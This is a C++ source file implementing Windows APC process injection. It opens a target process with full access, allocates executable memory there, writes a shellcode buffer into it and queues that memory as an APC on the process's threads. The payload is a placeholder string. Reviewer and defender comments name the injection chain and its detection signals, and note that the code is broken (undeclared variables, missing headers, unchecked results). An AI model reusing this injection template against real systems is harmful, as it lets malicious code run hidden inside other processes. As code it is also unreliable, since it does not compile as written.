apc.cpp
#include <iostream>
#include <string>
#include <Windows.h>
// Forward declaration of the routine defined directly below.
BOOL hijack_apc( DWORD proc_id,PTHREAD_START_ROUTINE pthread);
/*
 * hijack_apc - queue `pthread` as a user-mode APC on every thread that belongs
 * to one process.
 *
 * proc_id : id of the process whose threads are targeted. NOTE(review): the
 *           loop below compares against `dwOwnerPID`, which is not declared
 *           anywhere in this file, so the function does not compile as written
 *           and `proc_id` itself is never read.
 * pthread : address (valid in the target process) handed to QueueUserAPC as
 *           the APC routine; the APC argument is always NULL.
 *
 * Returns FALSE if the thread snapshot cannot be taken or Thread32First fails,
 * and TRUE once the whole snapshot has been walked. Every OpenThread and
 * QueueUserAPC result is discarded, so TRUE does not mean any APC was queued.
 *
 * Defender note: CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD) followed by
 * OpenThread(THREAD_ALL_ACCESS) and QueueUserAPC on threads of a *different*
 * process is the well-known APC-injection pattern. Cross-process thread-handle
 * opens with full access and APCs queued into foreign threads are the events
 * worth alerting on; the 2 s Sleep per thread also makes the pattern slow and
 * visible.
 */
BOOL hijack_apc(DWORD proc_id,PTHREAD_START_ROUTINE pthread)
{
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
HANDLE current_thread = NULL;
// System-wide thread snapshot (all processes); filtered by owner pid below.
hThreadSnap = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );
if( hThreadSnap == INVALID_HANDLE_VALUE )
return( FALSE );
// dwSize must be set before the first Thread32First call or it fails.
te32.dwSize = sizeof(THREADENTRY32 );
if( !Thread32First( hThreadSnap, &te32 ) )
{
// printError is neither declared nor defined in this file — presumably a
// helper carried over from the Tool Help sample this loop follows; confirm.
printError( TEXT("Thread32First") );
CloseHandle( hThreadSnap );
return( FALSE );
}
do
{
// NOTE(review): dwOwnerPID is undeclared here; proc_id is the parameter
// that carries the target pid.
if( te32.th32OwnerProcessID == dwOwnerPID )
{
// _tprintf comes from <tchar.h>, which is not among the visible includes.
_tprintf( TEXT("\n THREAD ID = 0x%08X"), te32.th32ThreadID );
// Full-access open with bInheritHandle = TRUE. A NULL result (thread gone,
// access denied) is not checked and is passed straight to QueueUserAPC.
current_thread = OpenThread(THREAD_ALL_ACCESS,TRUE,te32.th32ThreadID);
// The APC is only delivered once the target thread enters an alertable
// wait. The BOOL result is ignored and current_thread is never closed,
// so one thread handle leaks per matching thread.
QueueUserAPC((PAPCFUNC)pthread,current_thread,NULL);
// Fixed 2 s pause between threads.
Sleep(2000);
}
} while( Thread32Next(hThreadSnap, &te32 ) );
CloseHandle( hThreadSnap );
return( TRUE );
}
/*
 * main - copies a byte buffer into a fixed target process and passes its
 * remote address to hijack_apc so it is queued as an APC on that process's
 * threads. Always returns 0.
 *
 * The target pid 1234 is hard-coded twice (OpenProcess and hijack_apc). None
 * of the OpenProcess / VirtualAllocEx / WriteProcessMemory results is checked,
 * so a failed open or allocation propagates a NULL handle/address into the
 * following calls, and proc_handle is never closed.
 *
 * Defender note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx with
 * PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> QueueUserAPC is the textbook
 * remote-injection chain. An RWX private region in another process, written
 * from outside it and not backed by an image, is a high-signal indicator for
 * memory scanners and EDR telemetry.
 */
int main(){
// Placeholder payload. sizeof includes the terminating NUL, so that byte is
// allocated and copied along with the text.
char shellcode[] = "//your shellcode here";
LPVOID remote_addr = NULL;
HANDLE proc_handle=NULL;
// Second argument is bInheritHandle (a BOOL) but is passed NULL; the third
// is the hard-coded target pid. Result is not checked.
proc_handle = OpenProcess(PROCESS_ALL_ACCESS,NULL,1234);
// Reserve + commit an executable, writable region of exactly sizeof shellcode
// bytes in the target; a NULL result is not checked.
remote_addr = VirtualAllocEx(proc_handle,NULL,sizeof shellcode,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// The remote address is reinterpreted as a thread-start routine for hijack_apc.
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)remote_addr;
// Bytes-written out-parameter is NULL and the BOOL result is ignored.
WriteProcessMemory(proc_handle,remote_addr,shellcode,sizeof shellcode,NULL);
// Same literal pid as in OpenProcess above; proc_handle is not closed before return.
hijack_apc(1234,apcRoutine);
return 0;
}